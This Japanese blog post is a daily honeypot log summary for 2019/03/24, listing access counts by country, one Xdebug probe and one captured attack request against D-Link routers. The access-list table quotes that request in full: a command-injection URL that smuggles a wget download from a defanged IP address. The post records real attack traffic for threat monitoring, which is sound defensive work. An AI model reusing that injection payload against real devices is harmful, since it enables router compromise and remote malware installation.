cute_otter’s blog

ハニーポットの観察日記を付けています

ハニーポット観察日記(2019/03/24)

WOWHoneypot

ハニーポット「WOWHoneypot」で2019/03/24 (日) 00:00~23:59 UTC(運用80日目)に取得したログの簡易分析です。

D-Link製のルーター脆弱性を利用した攻撃とXdebugの探査が1件ずつありました。

概況

  • 集計期間 : 2019/03/24 (日) 00:00~23:59 UTC
  • 総アクセス件数 : 12 件(前日比 -6 件)
    • トップページへのアクセス : 10 件
    • D-Link製のルーター脆弱性を利用した攻撃 : 1 件
    • Xdebugの探査 : 1 件
  • ユニークIPアドレス件数 : 11 件 (前日比 -6 件)
  • アクセス元の国数 : 10 カ国 (前日比 +-0 カ国)

国別のアクセス件数

国別のアクセス件数は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. United States 2 - 0 +2 -
2. Brazil 2 1. 4 -2 -
3. Australia 1 - 0 +1 -
4. Italy 1 - 0 +1 -
5. South Africa 1 - 0 +1 -
6. Ukraine 1 7. 1 +-0 -
7. Japan 1 8. 1 +-0 -
8. Seychelles 1 - 0 +1 -
9. India 1 4. 2 -1 -
10. Russia 1 3. 3 -2 -

アクセス先

  • D-Link製のルーター脆弱性を利用した攻撃を1件観測しました。
    • 攻撃を受ける直前に、攻撃を行ったIPアドレスと同一のIPアドレスから/へのアクセスがありました。探査行為と思われます。
    • 探査と攻撃で使用されたUser-AgentはMozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36でした。
  • 探査系は、Xdebugの探査が1件あるだけでした。

アクセス先一覧

アクセス先の一覧は以下の通りです。

順位 備考 アクセス先 件数 前日の順位 前日の件数 件数差
1. トップページへのアクセス GET / HTTP/1.1 9 1. 15 -6
2. D-Link製のルーター脆弱性を利用した攻撃(参照) GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128[.]199[.]251[.]119/t[.]php%27$ HTTP/1.1 1 - 0 +1
3. トップページへのアクセス GET / HTTP/1.0 1 - 0 +1
4. Xdebugの探査 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1 - 0 +1

WOWHoneypotで取得したログの簡易分析は以上です。